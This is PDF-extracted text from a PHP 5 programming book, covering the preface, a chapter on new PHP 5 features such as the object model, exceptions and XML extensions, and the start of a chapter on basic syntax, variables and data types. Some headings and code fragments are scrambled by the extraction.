27 Gutmans_PrefaceFore Page xxvii Thursday, September 23, 2004 9:06 AM A Note About Coding Styles xxvii Chapter 15, “An Introduction to Writing PHP Extensions,” explains how to write your own custom PHP extension. We use a simple example to explain the most important things like parameter parsing and resource management. Chapter 16, “PHP Shell Scripting,” shows you how to write shell scripts in PHP, because PHP is useful for more than just web applications. We care- fully explain the differences between the CLI and CGI executables in which PHP comes, including command-line parameter parsing and process control. This book also includes three appendices. Appendix A, “PEAR and PECL Package Index,” provides an overview of all important packages, with descrip- tions and dependencies on other packages. Appendix B, “phpDocument Format Reference,” explains the syntax as understood by the PHP Documenter tool to generate API documentation from source code. Appendix C, “Zend Studio Quick Start,” is an introduction to working in the Zend Studio IDE. TYLES BOUT ODING OTE S A N C A There are almost as many coding styles as there are programmers. The PHP examples in this book follow the PEAR coding standard, with the opening curly bracket on the line below the function name. In some cases, we’ve placed the curly bracket on the same line as the function name. We encourage you to adopt the style you are most comfortable with. Note: , appears at the beginning of code ➥ A code continuation character, lines that have wrapped down from the line above it. THE BOUT OFTWARE A S Included in the back of this book is a special link to Zend.com, where you can download a fully functional, 90-day trial version of the Zend Studio IDE. Be sure to use the license key printed on the inside back cover of this book when you install Zend Studio. The Zend Development Environment (ZDE) is a convenient tool that integrates an editor, debugger, and project manager to help you develop, man- age, and debug your code. It can connect to your own installed server or directly to the Zend Studio server component. It is a powerful tool that allows you to debug your code in its natural environment. D U E AND OWNLOADS PDATES RRATA AND Updates, errata, and copies of the sample programs used in this book can be found at the following URL: http//php5powerprogramming.com. We encourage you to visit this site.

28 Gutmans_PrefaceFore Page xxviii Thursday, September 23, 2004 9:06 AM Preface xxviii CKNOWLEDGEMENTS A This book could not have been written without feedback from our technical reviewers; therefore, we would like to thank Marcus Börger, Steph Fox, Martin Jansen, and Rob Richards for their excellent comments and feedback. Besides these four reviewers, there are a few more people who helped answer several questions during the writing of this book, more specifically Christian Stocker for helping with the XML chapter, Wez Furlong and Sara Golemon for answering questions about the streams layer, Pierre-Alain Joye for providing some insights in the inner workings of the GD library, and less specifically the PEAR commu- nity for their support and dedication to a great repository of usable PEAR com- ponents. Some sections in this book were contributed by co-authors; Georg Richter contributed the MySQLi section of the database chapter, and Zeev Suraski added the section on Zend's Performance Suite. We would also like to thank Mark L. Taub and the editorial team of Pear- son PTR for the things they are good at doing: organizing, planning, and mar- keting this book, and making sure everything fits together. Thanks to Janet Valade, for helpful developmental editing support, and our project editor Kristy Hart, who helped us wrap up the book under pressure and put the final touches on it. Enjoy! Andi, Stig, and Derick

29 Gutmans_Ch01 Page 1 Thursday, September 23, 2004 2:35 PM CHAPTER 1 What Is New in PHP 5? “The best way to be ready for the future is to invent it.”— John Sculley NTRODUCTION 1.1 I Only time will tell if the PHP 5 release will be as successful as its two prede- cessors (PHP 3 and PHP 4). The new features and changes aim to rid PHP of any weaknesses it may have had and make sure that it stays in the lead as the world’s best web-scripting language. This book details PHP 5 and its new features. However, if you are familiar with PHP 4 and are eager to know what is new in PHP 5, this chapter is for you. When you finish reading this chapter, you will have learned The new language features ☞ News concerning PHP extensions ☞ ☞ Other noteworthy changes to PHP’s latest version F 1.2 L ANGUAGE EATURES 1.2.1 New Object-Oriented Model When Zeev Suraski added the object-oriented syntax back in the days of PHP 3, it was added as “syntactic sugar for accessing collections.” The OO model also had support for inheritance and allowed a class (and object) to aggregate both methods and properties, but not much more. When Zeev and Andi Gut- mans rewrote the scripting engine for PHP 4, it was a completely new engine; it ran much faster, was more stable, and boasted more features. However, the OO model first introduced in PHP 3 was barely touched. Although the object model had serious limitations, it was used exten- sively around the world, often in large PHP applications. This impressive use of the OOP paradigm with PHP 4, despite its weaknesses, led to it being the main focus for the PHP 5 release. 1

30 Gutmans_Ch01 Page 2 Thursday, September 23, 2004 2:35 PM What Is New in PHP 5? Chap. 1 2 So, what were some of the limitations in PHP 3 and 4? The biggest limi- tation (which led to further limitations) was the fact that the copy semantics of objects were the same as for native types. So, how did this actually affect the PHP developer? When assigning a variable (that points to an object) to another variable, a copy of the object would be created. Not only did this impact performance, but it also usually led to obscure behavior and bugs in PHP 4 applications because many developers thought that both variables would point at the same object, which was not the case. The variables were instead pointing at separate copies of the same object. Changing one would not change the other. For example: class Person { var $name; function getName() { return $this->name; } function setName($name) { $this->name = $name; } function Person($name) { $this->setName($name); } } function changeName($person, $name) { $person->setName($name); } $person = new Person("Andi"); changeName($person, "Stig"); print $person->getName(); . The reason is that we pass In PHP 4, this code would print out "Andi" is to the the object function by-value, and thus, $person changeName() $person . copied and works on a copy of changeName() $person This behavior is not intuitive, as many developers would expect the Java- like behavior. In Java, variables actually hold a handle (or pointer) to the object, and therefore, when it is copied, only the handle (and not the entire object) is duplicated. There were two kinds of users in PHP 4: the ones who were aware of this problem and the ones who were not. The latter would usually not notice this problem and their code was written in a way where it did not really matter if the problem existed. Surely some of these people had sleepless nights trying to track down weird bugs that they could not pinpoint. The former group dealt with this problem by always passing and assigning objects by reference. This would prevent the engine from copying their objects, but it would be a head- signs . ache because the code included numerous &

31 Gutmans_Ch01 Page 3 Thursday, September 23, 2004 2:35 PM 3 1.2 Language Features The old object model not only led to the afore-mentioned problems, but also to fundamental problems that prevented implementing some additional features on top of the existing object model. In PHP 5, the infrastructure of the object model was rewritten to work with object handles. Unless you explicitly clone an object by using the clone keyword, you never create behind-the-scenes duplicates of your objects. In PHP 5, you don’t need a need to pass objects by reference or assign them by reference. Note: Passing by reference and assigning by reference are still sup- ported, in case you want to actually change a variable’s content (whether object or other type). 1.2.2 New Object-Oriented Features The new OO features are too numerous to give a detailed description in this section. Chapter 3, “PHP 5 OO Language,” details each feature. The following list provides the main new features: ☞ private access modifiers for methods and properties. / protected / public Allows the use of common OO access modifiers to control access to methods and properties: class MyClass { private $id = 18; public function getId() { return $this->id; } } ☞ Unified constructor name . __construct() Instead of the constructor being the name of the class, it is now declared as , which makes it easier to shift classes inside class hier- __construct() archies: class MyClass { function __construct() { print "Inside constructor"; } } __destructor() method. Object destructor support by defining a ☞ Allows defining a destructor function that runs when an object is destroyed: class MyClass { function __destruct() { print ”Destroying object”; } }

32 Gutmans_Ch01 Page 4 Thursday, September 23, 2004 2:35 PM 4 What Is New in PHP 5? Chap. 1 Interfaces. ☞ Gives the ability for a class to fulfill more than one is-a relationships. A class can inherit only from one class, but may implement as many interfaces as it wants: interface Display { function display(); } class Circle implements Display { function display() { print "Displaying circle\n"; } } ☞ operator. instanceof Language-level support for is-a relationship checking. The PHP 4 function is_a() is now deprecated: if ($obj instanceof Circle) { print '$obj is a Circle'; } ☞ Final methods. final The keyword allows you to mark methods so that an inheriting class cannot overload them: class MyClass { final function getBaseClassName() { return __CLASS__; } } ☞ Final classes. After declaring a class as , it cannot be inherited. The following example final would error out. final class FinalClass { } class BogusClass extends FinalClass { } Explicit object cloning. ☞ clone __clone() To clone an object, you must use the keyword. You may declare a method, which will be called during the clone process (after the properties have been copied from the original object):

33 Gutmans_Ch01 Page 5 Thursday, September 23, 2004 2:35 PM 1.2 Language Features 5 class MyClass { function __clone() { print "Object is being cloned"; } } $obj = new MyClass(); $obj_copy = clone $obj; ☞ Class constants. Class definitions can now include constant values and are referenced using the class: class MyClass { const SUCCESS = "Success"; const FAILURE = "Failure"; } print MyClass::SUCCESS; ☞ Static methods. You can now define methods as static by allowing them to be called from variable non-object context. Static methods do not define the $this because they are not bound to any specific object: class MyClass { static function helloWorld() { print "Hello, world"; } } MyClass::helloWorld(); Static members. ☞ Class definitions can now include static members (properties) that are accessible via the class. Common usage of static members is in the pattern: Singleton class Singleton { static private $instance = NULL; private function __construct() { } static public function getInstance() { if (self::$instance == NULL) { self::$instance = new Singleton(); } return self::$instance; } }

34 Gutmans_Ch01 Page 6 Thursday, September 23, 2004 2:35 PM What Is New in PHP 5? Chap. 1 6 Abstract classes. ☞ to prevent it from being instantiated. A class may be declared abstract However, you may inherit from an abstract class: abstract class MyBaseClass { function display() { print "Default display routine being called"; } } Abstract methods. ☞ , thereby deferring its definition to an A method may be declared abstract inheriting class. A class that includes abstract methods must be declared : abstract abstract class MyBaseClass { abstract function display(); } ☞ Class type hints. Function declarations may include class type hints for their parameters. If the functions are called with an incorrect class type, an error occurs: function expectsMyClass(MyClass $obj) { } ☞ Support for dereferencing objects that are returned from methods. In PHP 4, you could not directly dereference objects that were returned from methods. You had to first assign the object to a dummy variable and then dereference it. PHP 4: $dummy = $obj->method(); $dummy->method2(); PHP 5: $obj->method()->method2(); ☞ Iterators. PHP 5 allows both PHP classes and PHP extension classes to implement Iterator an interface. After you implement this interface, you can iterate language foreach() instances of the class by using the construct: $obj = new MyIteratorImplementation(); foreach ($obj as $value) { print "$value"; }

35 Gutmans_Ch01 Page 7 Thursday, September 23, 2004 2:35 PM 7 1.2 Language Features For a more complete example, see Chapter 4, “PHP 5 Advanced OOP and Design Patterns.” __autoload(). ☞ Many developers writing object-oriented applications create one PHP source file per class definition. One of the biggest annoyances is having to write a long list of needed inclusions at the beginning of each script (one for each class). In PHP 5, this is no longer necessary. You may define an __autoload() function that is automatically called in case you are trying to use a class that has not been defined yet. By calling this function, the scripting engine offers one last chance to load the class before PHP bails out with an error: function __autoload($class_name) { include_once($class_name . "php"); } $obj = new MyClass1(); $obj2 = new MyClass2(); 1.2.3 Other New Language Features ☞ Exception handling. PHP 5 adds the ability for the well-known structured try/throw/catch exception-handling paradigm. You are only allowed to throw objects that class: inherit from the Exception class SQLException extends Exception { public $problem; function __construct($problem) { $this->problem = $problem; } } try { ... throw new SQLException("Couldn't connect to database"); ... } catch (SQLException $e) { print "Caught an SQLException with problem $obj->problem"; } catch (Exception $e) { print "Caught unrecognized exception"; } Currently for backward-compatibility purposes, most internal functions do not throw exceptions. However, new extensions make use of this capability, and you can use it in your own source code. Also, similar to the already exist- , you may use to catch an ing set_error_handler() set_exception_handler() unhandled exception before the script terminates.

36 Gutmans_Ch01 Page 8 Thursday, September 23, 2004 2:35 PM 8 What Is New in PHP 5? Chap. 1 foreach with references. ☞ In PHP 4, you could not iterate through an array and modify its values. foreach() loop with the PHP 5 supports this by enabling you to mark the & (reference) sign, which makes any values you change affect the array over which you are iterating: foreach ($array as &$value) { if ($value === "NULL") { $value = NULL; } } Default values for by-reference parameters. ☞ In PHP 4, default values could be given only to parameters, which are passed by-values. PHP 5 now supports giving default values to by- reference parameters: function my_func(&$arg = null) { if ($arg === NULL) { print '$arg is empty'; } } my_func(); 1.3 G PHP C HANGES ENERAL 1.3.1 XML and Web Services Following the changes in the language, the XML updates in PHP 5 are proba- bly the most significant and exciting. The enhanced XML functionality in PHP 5 puts it on par with other web technologies in some areas and overtakes them in others. 1.3.1.1 The Foundation XML support in PHP 4 was implemented using a variety of underlying XML libraries. SAX support was implemented using the old Expat library, XSLT was implemented using the Sablotron library (or using libxml2 via the DOM extension), and DOM was implemented using the more powerful libxml2 library by the GNOME project. Using a variety of libraries did not make PHP 4 excel when it came to XML support. Maintenance was poor, new XML standards were not always supported, performance was not as good as it could have been, and interopera- bility between the various XML extensions did not exist. In PHP 5, all XML extensions have been rewritten to use the superb libxml2 XML toolkit (http://www.xmlsoft.org/). It is a feature-rich, highly main- tained, and efficient implementation of the XML standards that brings cutting- edge XML technology to PHP.

37 Gutmans_Ch01 Page 9 Thursday, September 23, 2004 2:35 PM 1.3 General PHP Changes 9 All the afore-mentioned extensions (SAX, DOM, and XSLT) now use libxml2, including the new additional extensions SimpleXML and SOAP. 1.3.1.2 SAX As previously mentioned, the new SAX implementation has switched from using Expat to libxml2. Although the new extension should be compatible, some small subtle differences might exist. Developers who still want to work with the Expat library can do so by configuring and building PHP accordingly (which is not recommended). 1.3.1.3 DOM Although DOM support in PHP 4 was also based on the libxml2 library, it had bugs, memory leaks, and in many cases, the API was not W3C- compliant. The DOM extension went through a thorough facelift for PHP 5. Not only was the extension mostly rewritten, but now, it is also W3C-compliant. For as described by the W3C standard, studlyCaps example, function names now use which makes it easier to read general W3C documentation and implement what you have learned right away in PHP. In addition, the DOM extension now sup- ports three kinds of schemas for XML validation: DTD, XML schema, and RelaxNG. As a result of these changes, PHP 4 code using DOM will not always run in PHP 5. However, in most cases, adjusting the function names to the new standard will probably do the trick. 1.3.1.4 XSLT In PHP 4, two extensions supported XSL Transformations: the Sablotron extension and the XSLT support in the DOM extension. PHP 5 fea- tures a new XSL extension and, as previously mentioned, it is based on the libxml2 extension. As in PHP 5, the XSL Transformation does not take the XSLT stylesheet as a parameter, but depends on the DOM extension to load it. The stylesheet can be cached in memory and may be applied to many docu- ments, which saves execution time. 1.3.1.5 SimpleXML When looking back in a year or two, it will be clear that SimpleXML revolutionized the way PHP developers work with XML files. Instead of having to deal with DOM or—even worse—SAX, SimpleXML repre- sents your XML file as a native PHP object. You can read, write, or iterate over your XML file with ease, accessing elements and attributes. Consider the following XML file: John Doe 87234838 Janet Smith 72384329

38 Gutmans_Ch01 Page 10 Thursday, September 23, 2004 2:35 PM 10 What Is New in PHP 5? Chap. 1 The following code prints each client’s name and account number: $clients = simplexml_load_file('clients.xml'); foreach ($clients->client as $client) { print "$client->name has account number $client >account_number\n"; ➥ } It is obvious how simple SimpleXML really is. In case you need to implement an advanced technique in your Sim- pleXML object that is not supported in this lightweight extension, you can , manipulate it in dom_import_simplexml() convert it to a DOM tree by calling it simplexml_import_dom() . DOM, and convert it to SimpleXML using Thanks to both extensions using the same underlying XML library, switching between them is now a reality. 1.3.1.6 SOAP PHP 4 lacked official native SOAP support. The most com- monly used SOAP implementation was PEARs, but because it was imple- mented entirely in PHP, it could not perform as well as a built-in C extension. Other available C extensions never reached stability and wide adoption and, therefore, were not included in the main PHP 5 distribution. SOAP support in PHP 5 was completely rewritten as a C extension and, although it was only completed at a very late stage in the beta process, it was incorporated into the default distribution because of its thorough implementa- tion of most of the SOAP standard. defined in a WSDL file: The following calls SomeFunction() $client = new SoapClient("some.wsdl"); $client->SomeFunction($a, $b, $c); 1.3.1.7 New MySQLi (MySQL Improved) Extension For PHP 5, MySQL AB (http://www.mysql.com) has written a new MySQL extension that enables you to take full advantage of the new functionality in MySQL 4.1 and later. As opposed to the old MySQL extension, the new one gives you both a functional and an OO interface so that you can choose what you prefer. New features sup- ported by this extension include prepared statements and variable binding, SSL and compressed connections, transaction control, replication support, and more. 1.3.1.8 SQLite Extension Support for SQLite (http://www.sqlite.org) was first introduced in the PHP 4.3.x series. It is an embedded SQL library that does not require an SQL server, so it is suitable for applications that do not require the scalability of SQL servers or, if you deploy at an ISP that does not

39 Gutmans_Ch01 Page 11 Thursday, September 23, 2004 2:35 PM 1.4 Other New Features in PHP 5 11 offer access to an SQL server. Contrary to what its name implies, SQLite has many features and supports transactions, sub-selects, views, and large data- base files. It is mentioned here as a PHP 5 feature because it was introduced so late in the PHP 4 series, and because it takes advantage of PHP 5 by pro- viding an OO interface and supporting iterators. 1.3.1.9 Tidy Extension PHP 5 includes support for the useful Tidy (http:// tidy.sf.net/) library. It enables PHP developers to parse, diagnose, clean, and repair HTML documents. The Tidy extension supports both a functional and an OO interface, and its API uses the PHP 5 exception mechanism. 1.3.1.10 Perl Extension Although not bundled in the default PHP 5 package, the Perl extension allows you to call Perl scripts, use Perl objects, and use other Perl functionality natively from within PHP. This new extension sits within the PECL (PHP Extension Community Library) repository at http:// pecl.php.net/package/perl. THER N EW F EATURES 1.4 O PHP 5 IN This section discusses new features introduced in PHP 5. 1.4.1 New Memory Manager The Zend Engine features a new memory manager. The two main advantages are better support for multi-threaded environments (allocations do not need to perform any mutual exclusion locks), and after each request, freeing the allo- cated memory blocks is more efficient. Because this is an underlying infra- structure change, you will not notice it directly as the end user. 1.4.2 Dropped Support for Windows 95 Running PHP on the Windows 95 platform is not supported anymore due to Windows 95 does not support the functionality that PHP uses. Because Microsoft officially stopped supporting it in 2002, the PHP development com- munity decided that dropping the support was a wise decision. 1.5 S UMMARY You must surely be impressed by the amount of improvements in PHP 5. As previously mentioned, this chapter does not cover all the improvements, but only the main ones. Other improvements include additional features, many bug fixes, and a much-improved infrastructure. The following chapters cover PHP 5 and give you in-depth coverage of the named new features and others that were not mentioned in this chapter.

40 Gutmans_Ch01 Page 12 Thursday, September 23, 2004 2:35 PM

41 Gutmans_ch02 Page 13 Thursday, September 23, 2004 2:37 PM CHAPTER 2 PHP 5 Basic Language “A language that doesn’t have everything is actually easier to program in than some that do.”—Dennis M. Ritchie 2.1 I NTRODUCTION PHP borrows a bit of its syntax from other languages such as C, shell, Perl, and even Java. It is really a hybrid language, taking the best features from other languages and creating an easy-to-use and powerful scripting language. When you finish reading this chapter, you will have learned The basic language structure of PHP ☞ ☞ How PHP is embedded in HTML How to write comments ☞ ☞ Managing variables and basic data types Defining constants for simple values ☞ The most common control structures, most of which are available in ☞ other programming languages ☞ Built-in or user-defined functions If you are an experienced PHP 4 developer, you might want to skip to the next chapter, which covers object-oriented support of the language that has changed significantly in PHP 5. 13

42 Gutmans_ch02 Page 14 Thursday, September 23, 2004 2:37 PM PHP 5 Basic Language Chap. 2 14 MBEDDING 2.2 HTML E The first thing you need to learn about PHP is how it is embedded in HTML: Sample PHP Script The following prints "Hello, World": In this example, you see that your PHP code sits embedded in your marker. PHP then replaces that PHP code with its output (if there is any) while any non-PHP text (such as HTML) is passed through as-is to the web client. Thus, running the mentioned script would lead to the following output: Sample PHP Script The following prints "Hello, World": Hello, World Tip: You may also use a shorter as the PHP open tag if you enable the

43 Gutmans_ch02 Page 15 Thursday, September 23, 2004 2:37 PM 15 2.4 Variables C way ☞ /* This is a C like comment * which can span multiple * lines until the closing tags */ ☞ C++ way // This is a C++ like comment which ends at the end of the line ☞ Shell way # This is a shell like comment which ends at the end of the line 2.4 V ARIABLES Variables in PHP are quite different from compiled languages such as C and Java. This is because their weakly typed nature, which in short means you don’t need to declare variables before using them, you don’t need to declare their type and, as a result, a variable can change the type of its value as much as you want. $ Variables in PHP are preceded with a sign, and similar to most modern (underscore) and can then _ languages, they can start with a letter (A-Za-z) or contain as many alphanumeric characters and underscores as you like. Examples of legal variable names include $count $_Obj $A123 Example of illegal variable names include $123 $*ABC As previously mentioned, you don’t need to declare variables or their type before using them in PHP. The following code example uses variables: $PI = 3.14; $radius = 5; $circumference = $PI * 2 * $radius; // Circumference = * d π You can see that none of the variables are declared before they are used. $PI $radius Also, the fact that is a floating-point number, and (an integer) is not declared before they are initialized. PHP does not support global variables like many other programming languages (except for some special pre-defined variables, which we discuss later). Variables are local to their scope, and if created in a function, they are only available for the lifetime of the function. Variables that are created in the main script (not within a function) aren’t global variables; you cannot see

44 Gutmans_ch02 Page 16 Thursday, September 23, 2004 2:37 PM 16 PHP 5 Basic Language Chap. 2 them inside functions, but you can access them by using a special array , using the variable’s name as the string offset. The previous $GLOBALS[] example can be rewritten the following way: $PI = 3.14; $radius = 5; $circumference = $GLOBALS["PI"] * 2 * $GLOBALS["radius"]; Circumference = π * d // ➥ You might have realized that even though all this code is in the main scope (we didn’t make use of functions), you are still free to use , $GLOBALS[] although in this case, it gives you no advantage. 2.4.1 Indirect References to Variables An extremely useful feature of PHP is that you can access variables by using indirect references, or to put it simply, you can create and access variables by name at runtime. Consider the following example: $name = "John"; $$name = "Registered user"; print $John; This code results in the printing of " ." Registered user The bold line uses an additional to access the variable with name speci- $ ) and changing its value to " ". ( fied by the value of $name Registered user "John" Therefore, a variable called is created. $John You can use as many levels of indirections as you want by adding addi- signs in front of a variable. tional $ 2.4.2 Managing Variables Three language constructs are used to manage variables. They enable you to check if certain variables exist, remove variables, and check variables’ truth values. 2.4.2.1 isset() determines whether a certain variable has already isset() if the variable has been declared by PHP. It returns a boolean value true already been set, and otherwise, or if the variable is set to the value . NULL false Consider the following script: if (isset($first_name)) { print '$first_name is set'; } $first_name is defined. If This code snippet checks whether the variable true isset() $first_name is $first_name is defined, returns , which will display ' set. ' If it isn’t, no output is generated.

45 Gutmans_ch02 Page 17 Thursday, September 23, 2004 2:37 PM 2.4 Variables 17 can also be used on array elements (discussed in a later section) isset() and object properties. Here are examples for the relevant syntax, which you can refer to later: Checking an array element: ☞ if (isset($arr["offset"])) { ... } Checking an object property: ☞ if (isset($obj->property)) { ... } $obj $arr are set (before Note that in both examples, we didn’t check if or isset() construct returns we checked the offset or property, respectively). The false automatically if they are not set. isset() is the only one of the three language constructs that accepts an arbitrary amount of parameters. Its accurate prototype is as follows: isset($var1, $var2, $var3, ...); It only returns if all the variables have been defined; otherwise, it true returns . This is useful when you want to check if the required input vari- false ables for your script have really been sent by the client, saving you a series of checks. single isset() unset() “undeclares” a previously set variable, and frees 2.4.2.2 unset() any memory that was used by it if no other variable references its value. A call isset() on a variable that has been unset() returns false . to For example: $name = "John Doe"; unset($name); if (isset($name)) { print ’$name is set'; } isset() returns This example will not generate any output, because false . unset() can also be used on array elements and object properties similar to isset() .

46 Gutmans_ch02 Page 18 Thursday, September 23, 2004 2:37 PM 18 PHP 5 Basic Language Chap. 2 empty() empty() may be used to check if a variable has not been 2.4.2.3 . This language construct is usually used to check false declared or its value is if a form variable has not been sent or does not contain data. When checking a variable’s truth value, its value is first converted to a Boolean according to the . true/false rules in the following section, and then it is checked for For example: if (empty($name)) { print 'Error: Forgot to specify a value for $name'; } doesn’t contain a value that This code prints an error message if $name evaluates to true. 2.4.3 Superglobals As a general rule, PHP does not support global variables (variables that can automatically be accessed from any scope). However, certain special internal variables behave like global variables similar to other languages. These vari- ables are called and are predefined by PHP for you to use. Some superglobals examples of these superglobals are ☞ GET variables that PHP received $_GET[] . An array that includes all the from the client browser. ☞ . An array that includes all the POST variables that PHP received $_POST[] from the client browser. $_COOKIE[] . An array that includes all the cookies that PHP received from ☞ the client browser. $_ENV[] . An array with the environment variables. ☞ ☞ . An array with the values of the web-server variables. $_SERVER[] These superglobals and others are detailed in Chapter 5, “How to Write a Web Application with PHP.” On a language level, it is important to know that you can access these variables anywhere in your script whether function, $GLOBALS[] array, which method, or global scope. You don’t have to use the allows for accessing global variables without having to predeclare them or using the deprecated keyword. globals ASIC D ATA 2.5 B YPES T Eight different data types exist in PHP, five of which are scalar and each of the remaining three has its own uniqueness. The previously discussed variables can contain values of any of these data types without explicitly declaring their type. The variable “behaves” according to the data type it contains.

47 Gutmans_ch02 Page 19 Thursday, September 23, 2004 2:37 PM 2.5 Basic Data Types 19 2.5.1 Integers Integers are whole numbers and are equivalent in range as your C compiler’s value. On many common machines, such as Intel Pentiums, that means a long 32-bit signed integer with a range between –2,147,483,648 to +2,147,483,647. Integers can be written in decimal, hexadecimal (prefixed with 0x), and - octal notation (prefixed with 0), and can include / + signs. Some examples of integers include 240000 0xABCD 007 -100 Note: As integers are signed, the right shift operator in PHP always does a signed shift. 2.5.2 Floating-Point Numbers Floating-point numbers (also known as real numbers ) represent real double numbers and are equivalent to your platform C compiler’s data type. On common platforms, the data type size is 8 bytes and it has a range of approximately 2.2E–308 to 1.8E+308. Floating-point numbers include a deci- mal point and can include a - sign and an exponent value. + / Examples of floating-point numbers include 3.14 +0.9e-2 -170000.5 54.6E42 2.5.3 Strings Strings in PHP are a sequence of characters that are always internally null- terminated. However, unlike some other languages, such as C, PHP does not rely on the terminating null to calculate a string’s length, but remembers its length internally. This allows for easy handling of binary data in PHP—for example, creating an image on-the-fly and outputting it to the browser. The maximum length of strings varies according to the platform and C compiler, but you can expect it to support at least 2GB. Don’t write programs that test this limit because you’re likely to first reach your memory limit. When writing string values in your source code, you can use double quotes ("), single quotes (') or here-docs to delimit them. Each method is explained in this section.

48 Gutmans_ch02 Page 20 Thursday, September 23, 2004 2:37 PM 20 PHP 5 Basic Language Chap. 2 2.5.3.1 Double Quotes Examples for double quotes: "PHP: Hypertext Pre-processor" "GET / HTTP/1.0\n" "1234567890" Strings can contain pretty much all characters. Some characters can’t be written as is, however, and require special notation: \n Newline. \t Tab. \" Double quote. \\ Backslash. \0 ASCII 0 (null). \r Line feed. \$ Escape $ sign so that it is not treated as a variable but as the character . $ \{Octal #} —for exam- # The character represented by the specified octal ple, represents the letter \70 8 . \x{Hexadecimal #} —for # The character represented by the specified hexadecimal example, . 2 represents the letter \0x32 An additional feature of double-quoted strings is that certain notations of variables and expressions can be embedded directly within them. Without going into specifics, here are some examples of legal strings that embed vari- ables. The references to variables are automatically replaced with the vari- ables’ values, and if the values aren’t strings, they are converted to their would be 123 corresponding string representations (for example, the integer first converted to the string "123" ). "The result is $result\n" "The array offset $i contains $arr[$i]" In cases, where you’d like to concatenate strings with values (such as vari- ables and expressions) and this syntax isn’t sufficient, you can use the . (dot) oper- ator to concatenate two or more strings. This operator is covered in a later section. In addition to double quotes, single quotes may also 2.5.3.2 Single Quotes delimit strings. However, in contrast to double quotes, single quotes do not support all the double quotes’ escaping and variable substitution. The following table includes the only two escapings supported by single quotes: \' Single quote. \\ Backslash, used when wanting to represent a backslash fol- lowed by a single quote—for example, \\' .

49 Gutmans_ch02 Page 21 Thursday, September 23, 2004 2:37 PM 2.5 Basic Data Types 21 Examples: 'Hello, World' 'Today\'s the day' enable you to embed large pieces of text in Here-docs 2.5.3.3 Here-Docs your scripts, which may include lots of double quotes and single quotes, with- out having to constantly escape them. The following is an example of a here-doc: <<

50 Gutmans_ch02 Page 22 Thursday, September 23, 2004 2:37 PM 22 PHP 5 Basic Language Chap. 2 In PHP 4, you could use [] Note: (square brackets) to access string offsets. This support still exists in PHP 5, and you are likely to bump into it often. {} notation because it differentiates string However, you should really use the offsets from array offsets and thus, makes your code more readable. 2.5.4 Booleans Booleans were introduced for the first time in PHP 4 and didn’t exist in prior versions. A Boolean value can be either true false . or As previously mentioned, PHP automatically converts types when needed. Boolean is probably the type that other types are most often converted if state- to behind the scenes. This is because, in any conditional code such as ments, loops, and so on, types are converted to this scalar type to check if the condition is satisfied. Also, comparison operators result in a Boolean value. Consider the following code fragment: $numerator = 1; $denominator = 5; if ($denominator == 0) { print "The denominator needs to be a non-zero number\n"; } The result of the equal-than operator is a Boolean; in this case, it would be and, therefore, the if() statement would not be entered. false Now, consider the next code fragment: $numerator = 1; $denominator = 5; if ($denominator) { /* Perform calculation */ } else { print "The denominator needs to be a non-zero number\n"; } You can see that no comparison operator was used in this example; how- $denominator or, to be more accu- ever, PHP automatically internally converted statement 5 true , to perform the if() to its Boolean equivalent, rate, the value and, therefore, enter the calculation. Although not all types have been covered yet, the following table shows truth values for their values. You can revisit this table to check for the types of Boolean value equivalents, as you learn about the remaining types.

51 Gutmans_ch02 Page 23 Thursday, September 23, 2004 2:37 PM 2.5 Basic Data Types 23 False Values Data Type True Values All non-zero values 0 Integer All non-zero values Floating point 0.0 Empty strings ()"" Strings All other strings The zero string ()"0" Never Always Null Array If it contains at least If it does not contain any elements one element Object Never Always Resource Never Always 2.5.5 Null is a data type with only one possible value: the value. It marks vari- Null NULL ables as being empty, and it’s especially useful to differentiate between the empty string and null values of databases. The isset($variable) operator of PHP returns false for , and true for NULL any other data type, as long as the variable you’re testing exists. The following is an example of using NULL : $value = NULL; 2.5.6 Resources , a special data type, represent a PHP extension resource such as a Resources database query, an open file, a database connection, and lots of other external types. You will never directly touch variables of this type, but will pass them around to the relevant functions that know how to interact with the specified resource. 2.5.7 Arrays An array in PHP is a collection of key/value pairs. This means that it maps can be either integers or strings keys (or indexes) to values. Array indexes whereas values can be of any type (including other arrays). Tip: Arrays in PHP are implemented using hash tables, which means that accessing a value has an average complexity of O(1). 2.5.7.1 array() construct Arrays can be declared using the lan- array() guage construct, which generally takes the following form (elements inside , are optional): square brackets, [] array([key =>] value, [key =>] value, ...)

52 Gutmans_ch02 Page 24 Thursday, September 23, 2004 2:37 PM 24 PHP 5 Basic Language Chap. 2 The key is optional, and when it’s not specified, the key is automatically assigned one more than the largest previous integer key (starting with 0). You can intermix the use with and without the key even within the same declara- tion. The value itself can be of any PHP type, including an array. Arrays con- taining arrays give a similar result as multi-dimensional arrays in other lan- guages. Here are a few examples: array(1, 2, 3) array(0 => 1, 1 => 2, 2 is the same as the more explicit ☞ => 3) ➥ . array("name" => "John", "age" => 28) ☞ ☞ array(1 => "ONE", 2 => array(1 => "ONE", "TWO", "THREE") is equivalent to "TWO", 3 => "THREE"). ➥ an empty array. ☞ array() array() statement: Here’s an example of a nested array(array("name" => "John", "age" => 28), array("name" => "Barbara", "age" => 67)) ➥ The previous example demonstrates an array with two elements: Each one is a collection (array) of a person’s information. Array elements can be accessed by using 2.5.7.2 Accessing Array Elements the key $arr[key] notation, where is either an integer or string expression. make sure you don’t forget the single or When using a constant string for key, . This notation can be used for both reading double quotes, such as $arr["key"] array elements and modifying or creating new elements. 2.5.7.3 Modifying/Creating Array Elements $arr1 = array(1, 2, 3); $arr2[0] = 1; $arr2[1] = 2; $arr2[2] = 3; print_r($arr1); print_r($arr2); The print_r() function has not been covered yet in this book, but when it is passed an array, it prints out the array’s contents in a readable way. You can use this function when debugging your scripts. The previous example prints Array ( [0] => 1

